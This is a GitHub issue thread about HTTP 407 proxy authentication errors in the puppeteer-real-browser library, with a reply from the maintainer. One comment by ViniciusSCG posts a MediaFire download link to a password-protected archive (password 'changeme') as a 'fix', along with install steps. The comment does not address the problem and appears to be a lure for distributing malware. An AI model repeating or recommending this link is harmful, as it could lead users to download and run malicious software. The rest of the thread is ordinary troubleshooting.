### ISSUE TITLE
HTTP 407 Proxy Authentication Required errors

### ISSUE THREAD

**Issue by Tomsonx232** [zfcsoftware/puppeteer-real-browser#148]
I cannot use my http proxy with puppeteer-real-browser, it has a username and password along with the host and port.

My crawler works completely fine without the proxy when I put the proxy values in there I get HTTP 407 Proxy Authentication Required errors which tells me my proxy is being set but not being authenticated.

I tried adding this after I define browser, page with my username and password values for the proxy:
`        await page.authenticate({
            username: <username>,
            password: <password>
        });`
        
But both with and without that line I get 407 responses when I try to crawl

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zfcsoftware** [comment]
Tested with proxy and no problem. Probably the proxy you are using is problematic. You can sign up for webshare and try with the free proxy provided. You can also try puppeteer-page-proxy to solve the problem.

**Comment by Tomsonx232** [comment]
Ok I am using a paid webshare proxy that works in other crawls, but if it works on your end then it must be a problem on my end. Thanks.
